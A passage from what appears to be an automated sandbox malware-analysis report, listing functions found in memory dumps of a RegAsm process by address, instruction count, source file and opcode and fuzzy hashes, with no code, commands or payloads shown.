                                                                                                                                                                                  • Instruction Fuzzy Hash: 54E022B770E935A3EA20140E7C88B3AE47AEFC6A50BD00839F801C3304E598CC0203A1
                                                                                                                                                                                  Function 02CB5440 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ee01508569b783ab396022562df49026fcd4f88ca8cb2335d4dd7f22215e1b79
                                                                                                                                                                                  • Instruction ID: fec9fe1b26b771ec41667bf607335853815bb1aeb577c51806ccd96dbd3fc4ee
                                                                                                                                                                                  • Opcode Fuzzy Hash: ee01508569b783ab396022562df49026fcd4f88ca8cb2335d4dd7f22215e1b79
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FF05C303401049FCA11B60EDC00B9A32CEEFC0751F644855A205DB285DEA0CC038760
                                                                                                                                                                                  Function 0101A3E1 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e93ac86dab5074082c1dbe58ae3bbf5b0515e03870b57f0422028f4055b16104
                                                                                                                                                                                  • Instruction ID: 8ff73e5e16828054158af3c66c9ac22847256cf013064d12a2b71f26bf58737e
                                                                                                                                                                                  • Opcode Fuzzy Hash: e93ac86dab5074082c1dbe58ae3bbf5b0515e03870b57f0422028f4055b16104
                                                                                                                                                                                  • Instruction Fuzzy Hash: 39F0E5B3A00108ABC700EBA8D8406DE7BEEEB95220B0140E3E904C3254ED358B0467A0
                                                                                                                                                                                  Function 01011D1F Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 2fad7655d1783d69ec352d7477edcdf3bb65b091eab9a2568b283beb49ff66b5
                                                                                                                                                                                  • Instruction ID: 1ab305b7b6980af440cb54cf36290c96bd788df30e69009dd428c53b13b54a77
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fad7655d1783d69ec352d7477edcdf3bb65b091eab9a2568b283beb49ff66b5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 31F02B76C0D1588FC76BF634A4087F937A2EF81340F8942B6C589C755AC7380C0B4342
                                                                                                                                                                                  Function 02CB0691 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 6db0adf11828165c828aad70877cce921eb929d8208f66a2928dfb7db8fb8edc
                                                                                                                                                                                  • Instruction ID: ed10a2cd43fb79077085c42375cd3a6e9df40431f7b4cb2336fea15e1c581795
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6db0adf11828165c828aad70877cce921eb929d8208f66a2928dfb7db8fb8edc
                                                                                                                                                                                  • Instruction Fuzzy Hash: 62E022223080902FC202236A6D618BA3FEBDFCA06C30C449AE549C7302DA28DC1383A0
                                                                                                                                                                                  Function 02CBBB50 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 6aafe25869d2592aac3599e58101c81325bdd0d81d4bdfce37217618c5636c8d
                                                                                                                                                                                  • Instruction ID: e10270ccfd86e36af0a5a581b4c50fdda22e2bdac69a3e31ca70cb9716ecd52e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6aafe25869d2592aac3599e58101c81325bdd0d81d4bdfce37217618c5636c8d
                                                                                                                                                                                  • Instruction Fuzzy Hash: DFE0EDA116E7806FE34696289C617D63FA1CB93310F8A52DAD081CB5EBC61C8A0B8721
                                                                                                                                                                                  Function 02CB69C0 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: bb7b30a25366a0002587f992a9bd72ea901be57835a0d6e9571582739d2a05a8
                                                                                                                                                                                  • Instruction ID: 08f4ad28ef73580f3f74de3025af17f864ee9dd806c98f626a864cbce2f85e38
                                                                                                                                                                                  • Opcode Fuzzy Hash: bb7b30a25366a0002587f992a9bd72ea901be57835a0d6e9571582739d2a05a8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1EF0D43210419CBF8F429E95CC10CFA7FAAEF4D254B088086FEA492161C676D961EBA0
                                                                                                                                                                                  Function 053341E8 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8af42464527d74600016a5525b8a04f12b3dc055ba83edcdc5b4b9e919d68488
                                                                                                                                                                                  • Instruction ID: 48ac09f7bbb269695fc370d008f6a84520a152b14549c90f271b833f12596033
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8af42464527d74600016a5525b8a04f12b3dc055ba83edcdc5b4b9e919d68488
                                                                                                                                                                                  • Instruction Fuzzy Hash: 28F058720081986FCB42CE999C00AFB7FA9AB49164B088086FD9496152C63AD921EBA0
                                                                                                                                                                                  Function 05335310 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f8f9466f52baba507240e22c3398bce5cbafe0e8731a38ab6c062f5c28f2ebab
                                                                                                                                                                                  • Instruction ID: 09ec8470720ec4d870b394f447e467e1c24185a3127fb86c8a9d8efe3c8bc151
                                                                                                                                                                                  • Opcode Fuzzy Hash: f8f9466f52baba507240e22c3398bce5cbafe0e8731a38ab6c062f5c28f2ebab
                                                                                                                                                                                  • Instruction Fuzzy Hash: 28F06535310524AB8715EA5BEC94C6F77AFEBDC770B508125F50E87354CE309C029795
                                                                                                                                                                                  Function 053401C8 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142831586.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5340000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 2a2b66a830b26ab5b8e2b91dfb8f7b59de1dee598baeace1ba3c4c58cb2146fd
                                                                                                                                                                                  • Instruction ID: bf49d1188ddca320c38e4f82b3bd001b5857f14d0726a8964c29b78d7f644243
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a2b66a830b26ab5b8e2b91dfb8f7b59de1dee598baeace1ba3c4c58cb2146fd
                                                                                                                                                                                  • Instruction Fuzzy Hash: F0F082306052449FC745CBB8D950B5ABFE6EB8A200F14C1EE9488CB666DB359D01DB05
                                                                                                                                                                                  Function 01010860 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 182c568e6743653383a8e99a67572edf2c550da50d13c456645136ede860b796
                                                                                                                                                                                  • Instruction ID: 799c937203c61d0f6b1ffbf9259d2895197d83bd96b5b7063d6d1218ce08ca57
                                                                                                                                                                                  • Opcode Fuzzy Hash: 182c568e6743653383a8e99a67572edf2c550da50d13c456645136ede860b796
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DD0171188F3C95FC7230270AD6B8D03FB0890311430B40DBA8D9EF8A3D018044F9B23
                                                                                                                                                                                  Function 01011DB1 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f712fe799c3ec172fb0ce4930f3eb90695abe4bc43494bd9cc0e64be87e0b7d8
                                                                                                                                                                                  • Instruction ID: 8cecb8ec1228829e191f8f4786db2e2c38f42fc48daa4fbb1f2562b709447fc4
                                                                                                                                                                                  • Opcode Fuzzy Hash: f712fe799c3ec172fb0ce4930f3eb90695abe4bc43494bd9cc0e64be87e0b7d8
                                                                                                                                                                                  • Instruction Fuzzy Hash: DBF0ED323463400FC302A734EC14EA93FB1AB8A704B0648EAF485CB3F6C6229C138B12
                                                                                                                                                                                  Function 0532F159 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 66c4ceb275a84fb4d8e09475e7027b4c98fa26feed8963b2192cb2b1ef5abb88
                                                                                                                                                                                  • Instruction ID: a97b3bcde579da4e91e74d8315910bf3040879744ef951081e8cb2fe89f830ed
                                                                                                                                                                                  • Opcode Fuzzy Hash: 66c4ceb275a84fb4d8e09475e7027b4c98fa26feed8963b2192cb2b1ef5abb88
                                                                                                                                                                                  • Instruction Fuzzy Hash: 63F0823151464CAFCB01EFA8D8019D9BF75EF8A310F05C6AAFC446B211EB32E965DB91
                                                                                                                                                                                  Function 0532B24A Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 0e7928a8ba2a598ece9abc4b332a815bad8a9c969fd1c373190c6ecfd61977d7
                                                                                                                                                                                  • Instruction ID: 0d75094a226c9ed7e009e01a9876ba139d03230afddfa30495333f63ea4a1c88
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e7928a8ba2a598ece9abc4b332a815bad8a9c969fd1c373190c6ecfd61977d7
                                                                                                                                                                                  • Instruction Fuzzy Hash: CBF07436110114BFCB068F84DD40E95BFA6EF89220B19819AFA544B232C672D921EB50
                                                                                                                                                                                  Function 02CBF280 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7cba4d77f6fbab201ec04665587ecc9b3b5c35d7ce7d8eea2daa69f53a925ce6
                                                                                                                                                                                  • Instruction ID: 00e58234feb12f34f16bcbc2ca386ed89503843d1e1473eab32ced897aa88fcc
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7cba4d77f6fbab201ec04665587ecc9b3b5c35d7ce7d8eea2daa69f53a925ce6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AE039B21040987FCB418E99CC11EBA7FACDB5D110F08804ABD94C2241D52ADA229BA0
                                                                                                                                                                                  Function 0101C828 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: bd10bffa09e92b1371503642421664f9bdca53058b7133c34c14cbe92ca7e5f5
                                                                                                                                                                                  • Instruction ID: 5c806eebe7d387a9edeb3695e73e29b6faee7efe54fb15bb277202eaf4c65390
                                                                                                                                                                                  • Opcode Fuzzy Hash: bd10bffa09e92b1371503642421664f9bdca53058b7133c34c14cbe92ca7e5f5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 42E092B61041983FC301CA49CC50BA37BDCCB4A121F088097BC94C2282C56DE902E7B0
                                                                                                                                                                                  Function 0101ADD2 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b930cbd3d1f26e0c78a7375d3ea87fa4b8abff3b75a5e013d675ede2781fbfce
                                                                                                                                                                                  • Instruction ID: 7558fbf9697d081c87c7324e4a6568037968088853fa7c7831604283d916dc99
                                                                                                                                                                                  • Opcode Fuzzy Hash: b930cbd3d1f26e0c78a7375d3ea87fa4b8abff3b75a5e013d675ede2781fbfce
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0CE09B33311018ABCB05EF89EC45FDB376BEBD8360F448015B509D6294CA799C11E7A0
                                                                                                                                                                                  Function 05325FA8 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e5d2502387d10ced240c7f620bdd736de102da2be9edb34e5d007e70e4b3a449
                                                                                                                                                                                  • Instruction ID: 3dd503431b470ee6f96546d0d6ebdbacd68c82dbc8429ec3cc3bcc51e3a7275b
                                                                                                                                                                                  • Opcode Fuzzy Hash: e5d2502387d10ced240c7f620bdd736de102da2be9edb34e5d007e70e4b3a449
                                                                                                                                                                                  • Instruction Fuzzy Hash: B1F0923B110014AFCB468FC4DD55DA1BF76EF8C220B0AC49AE6188F272C632D926EB50
                                                                                                                                                                                  Function 0101A397 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c6d0595c61a3754609bfd5337f7c6fa1cc9ed4bb71f256f97cb5359620d64cb5
                                                                                                                                                                                  • Instruction ID: b2fa74714154a7dea74ebc5e7a62481416860bce59dae5b8b2b597e11475fa81
                                                                                                                                                                                  • Opcode Fuzzy Hash: c6d0595c61a3754609bfd5337f7c6fa1cc9ed4bb71f256f97cb5359620d64cb5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 18E09A3221415877DB116989EC01BEB3B6EDBC8360F14806AFA0686281C9789906A7A0
                                                                                                                                                                                  Function 0101DF10 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e987ffba8cf112e87ca1a83d3e301a1ec2a736223094a61d186b45798ca305a1
                                                                                                                                                                                  • Instruction ID: bd19371b1a1c04a8e77e87b55f3a3715e8d915ba2e3cb346ded6cbf51f24cc4d
                                                                                                                                                                                  • Opcode Fuzzy Hash: e987ffba8cf112e87ca1a83d3e301a1ec2a736223094a61d186b45798ca305a1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 24E09B327100289BC718EA5DE848A6F776EE7D8321F14C569F64687388CF749D42C7D0
                                                                                                                                                                                  Function 05320082 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7507d9da2401d6ad88ee75312ab63e062c34ca9a3bdbf91df37bce03c5ec05a4
                                                                                                                                                                                  • Instruction ID: daa542248fc0e686327f24f69dc3003b486e224dc315398d5d7c15074fbb64c3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7507d9da2401d6ad88ee75312ab63e062c34ca9a3bdbf91df37bce03c5ec05a4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 35E092767400159F8704EE99EC4459FF3A6EFCC3147408566EA07C3B05CE38591A8FE0
                                                                                                                                                                                  Function 0532F863 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 736f5a807268aebce911301c35e6fc3ebf0444c66bef6f5f19b1d75c52d6e4d7
                                                                                                                                                                                  • Instruction ID: 7052bd8832c80b1ccd7eb0b617d2fcfd3da13b96e039f130674ca33f389871bd
                                                                                                                                                                                  • Opcode Fuzzy Hash: 736f5a807268aebce911301c35e6fc3ebf0444c66bef6f5f19b1d75c52d6e4d7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 88F0E576A051049FC346CBA4CA41759FBF5EF85200F2484FA9009CB361FA31DE02D711
                                                                                                                                                                                  Function 01014612 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e290108c2e90aed4ed30bc31a74690f6b61c19e6413d7d64ccf996b87a7594c3
                                                                                                                                                                                  • Instruction ID: d3a0055dbfbac09c9d6ce1b5692070391c8e7277e3d2de239d226b6b9410ff0a
                                                                                                                                                                                  • Opcode Fuzzy Hash: e290108c2e90aed4ed30bc31a74690f6b61c19e6413d7d64ccf996b87a7594c3
                                                                                                                                                                                  • Instruction Fuzzy Hash: F3E06D72A50108EFCB04FB69ED82BDE77B9EF48221F400568E80997294DA386E41DB90
                                                                                                                                                                                  Function 0532B201 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b4bd816d82505aa514d62797e65c107714aae055a6fd79faf7e49c1b690dcd1d
                                                                                                                                                                                  • Instruction ID: 2390f4996b6036d3ce6a3f8aa8b8964a58c647dae01a6bd2eb6ae3776b4a56fa
                                                                                                                                                                                  • Opcode Fuzzy Hash: b4bd816d82505aa514d62797e65c107714aae055a6fd79faf7e49c1b690dcd1d
                                                                                                                                                                                  • Instruction Fuzzy Hash: F7E08C6284924CAFCB01DEA4D9507C9BFF9DF4A240F5000E6D548D7266E9368A05A752
                                                                                                                                                                                  Function 053341F8 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 40b153383e6de520665622cd19abb3d691de445f4deecf93faaa50dfd1b24b64
                                                                                                                                                                                  • Instruction ID: 704a75d8dcbbdfedf44427af84db028faf61110e9c107736e094e3b967943e86
                                                                                                                                                                                  • Opcode Fuzzy Hash: 40b153383e6de520665622cd19abb3d691de445f4deecf93faaa50dfd1b24b64
                                                                                                                                                                                  • Instruction Fuzzy Hash: 81E0ED721041987F8B41CE95CC10CFA7FEDEB4D265B088046FE98D2151C576DD21EBB0
                                                                                                                                                                                  Function 02CB06A0 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e022a9e75ff5921f85a82d5982af072c1e5761b0d5a23f30665718c806b6cce9
                                                                                                                                                                                  • Instruction ID: a4ee8e19a2dc3afcf6c79f128be478041026ec3aacf5cb3693c6580832311e2a
                                                                                                                                                                                  • Opcode Fuzzy Hash: e022a9e75ff5921f85a82d5982af072c1e5761b0d5a23f30665718c806b6cce9
                                                                                                                                                                                  • Instruction Fuzzy Hash: B0E0C2753000102B1105365BBC908BBB6DFEBC85A83084126F60CC3300DE556C0282E0
                                                                                                                                                                                  Function 02CB6BB7 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e3e40a47977e7423861ed6689f66216ea1e82dfbb114402a7fbdb7031019cbad
                                                                                                                                                                                  • Instruction ID: 19ae350cee3a8a34a3d8897e5227a306870bcfa4211c276a5489e0539b75e7fe
